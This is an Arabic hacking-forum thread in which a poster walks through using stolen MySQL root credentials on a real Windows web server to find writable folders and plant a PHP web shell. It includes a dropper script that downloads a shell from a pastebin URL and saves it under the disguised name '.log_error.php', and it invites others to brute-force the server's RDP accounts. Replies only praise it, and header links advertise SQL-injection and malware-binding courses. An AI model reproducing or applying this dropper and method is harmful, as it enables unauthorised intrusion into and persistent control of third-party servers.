1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] تخطي العقبات بعد الحصول على Database root access on win server

الموضوع في 'آمن المواقع والسيرفرات' بواسطة Dr.aL-jArH, بتاريخ ‏10 ديسمبر 2014.

كاتب الموضوع : Dr.aL-jArH المشاهدات : 331 الردود : 6 ‏10 ديسمبر 2014
  1. غير متصل

    Dr.aL-jArH
    DeveloPer Plus

    عضو منذ:
    ‏24 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    كيف الحال يا شباب الحماية
    عسى الله يديم حفظه وبركاته علينا

    منذ فترة حصلت على رووت في قواعد البيانات على إحدى السيرفرات وكان ( وندوز سيرفر )
    وتفاجئت إنه أصحاب لي كثير ما عرفو يتصرفو فيه ولا يعرفو كيف يستخدموه
    وما زال الأمر غامض بالنسبة لهم رغم إنه بسيط لدى الكثيرين هنا ,, ما شاء الله
    فوعدتهم بشرح أوضح فيه إزالة هذا اللبس من أذهانهم

    ملاحظة بسيطة : Database root access on win server
    يعني : تستخدم أي سكربت للإتصال بقواعد البيانات
    أو حتى التي مرفقة بالشلات
    وتضع آي بي السيرفر الذي لديك
    و اليوزر : root والباس : الذي حصلت عليه


    الآن أنا استخدمت سكربت
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]
    للدخول للسيرفر

    [​IMG]

    الآن ظهرت لنا قواعد السيرفر [​IMG] ,, @ التي كل منها تمثل قاعدة لموقع من مواقع السيرفر

    [​IMG]

    وأنا اخترقت القاعدة 1651fytz حتى أجرب أحقن شل بداخلها
    وضعت الآي بي في سكربت لعرض مواقع السيرفر محاولاً إيجاد أي إسم لموقع يشبه إسم القاعدة المستهدفة
    فوجدت اسم الموقع مطابق تماماً

    [​IMG]

    ندخل للموقع ونشوف

    [​IMG]

    ههههههه ,, سبحان الله الموقع فيه أخطاء
    وهو المطلوب لكي نحدد المسارات الداخلية للسيرفر

    نجرب نبحث عن مجلد مصرح حتى نستطيع حقن شلنا بداخله
    أنا وجدت مجلدين مصرحين وهم : includes , images


    الآن بعد ما تخطينا عقبة مهمة وهي : تحديد الموقع والقاعدة والمجلد المصرح
    ,, نروح نجرب ننشأ ملف ع الموقع بعد ما عرفنا المسارات المصرحة

    كود PHP:
    D:\wwwroot\1651fytz\wwwroot\includes\
    D:\wwwroot\1651fytz\wwwroot\images\
    [​IMG]

    هو أمر SQL يقوم بكتابة ملف في المسار المحدد
    إلي يعرفون أساسيات الـphp ما رح يكون هالأمر غامض عليهم

    نروح نشوف هل حقاً أنشأ الملف إلي حفناه ؟!!

    [​IMG]

    بالفعل تم إنشاء الملف ..@ وهذا يعني إنه بإمكاننا حقن شل
    لكن أرجو الإنتباه هنا إلى أمرين وهما :

    1- استبدال السلاش \ بالسلاش / عند حقن الشل
    2- تجنب حقن أكواد كثيرة عند إنشاء الملف لكي لا يكون هنالك
    لخبطة وأخطاء وخصوصاً في إشارتي " و ' السنغل والدبل كوتيشن

    ولذلك وضعت لكم كود بسيط ينشأ ملف ويستدعي الشل بصيغة txt مرفوع مسبقاً

    وهذا هو الكود


    كود PHP:
     <?php
    $get 
    file_get_contents('http://pastebin.com/raw.php?i=5ZnaEDBN');
    $x fopen('.log_error.php','w+');
    $fw fwrite($x,$get);
    fclose($x);
    if(
    $fw){
    echo 
    'Done ~';
    }else{
    echo 
    'Not Worked !!';
    }
    ?> 
    وقمت ببرمجة سكربت بسيط يختصر العملية
    تدخل له اليوزر والباس والآي بي والقاعدة المحددة
    وهو بيحقن

    [​IMG]

    قمناا بالحقن عن طريق السكربت

    وهذه صورة لنجاح العملية

    [​IMG]

    تم رفع شل ^_* [​IMG]
    حاولت بالسيرفر قليلاً للتخطي ,~ لكن لم أفلح
    وأظن التخطي مسألة وقت فقط يعني مو بالصعوبة

    السيرفر مفعل الديسك توب و هذه اليوزرات للي بده يخمن

    [​IMG]


    ومتى تخطيت ننزل شرح آخر للتخطي

    السكربت موجود في الشرح , مرفق بنهاية الموضوع

    لم أرد أن أضع الشل في موضوع إلتزاماً بالقوانين
    ومن أراده أرسله له ع الخاص إن شاء الله

    في أمان الله

     


    جاري تحميل الصفحة...
  2. غير متصل

    عُبْدُالـڔבـَمَڼ
    rank
    Developer

    عضو منذ:
    ‏29 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    |[ HacKeR - Security - Hacking Software ]|
    الإقامة:

    رد: تخطي العقبات بعد الحصول على Database root access on win server

    بارك الله فيك أخي العزيز :{21}:
     


  3. غير متصل

    IRAQRT
    rankrank
    Developer

    عضو منذ:
    ‏21 نوفمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: تخطي العقبات بعد الحصول على Database root access on win server

    عاشت لايادي على الشرح المميز تسلم حبيبي :*
     


  4. غير متصل

    .ılı.Iяẫqi.ılı.
    DeveloPer Plus

    عضو منذ:
    ‏22 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الإقامة:

    رد: تخطي العقبات بعد الحصول على Database root access on win server

    يعطييك ، ألعآفييه يآبطل ...!
     


  5. غير متصل

    Norilkon
    rankrank
    Developer

    عضو منذ:
    ‏8 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: تخطي العقبات بعد الحصول على Database root access on win server

    يعطيك العافيه يالطيب
     


  6. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: تخطي العقبات بعد الحصول على Database root access on win server

    عاشت ايدك
     


  7. غير متصل

    Mokhalad HaXor
    V • I • P

    عضو منذ:
    ‏3 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,460
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:

    رد: تخطي العقبات بعد الحصول على Database root access on win server

    عاشت ايدك يا ورد :{4!}:
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...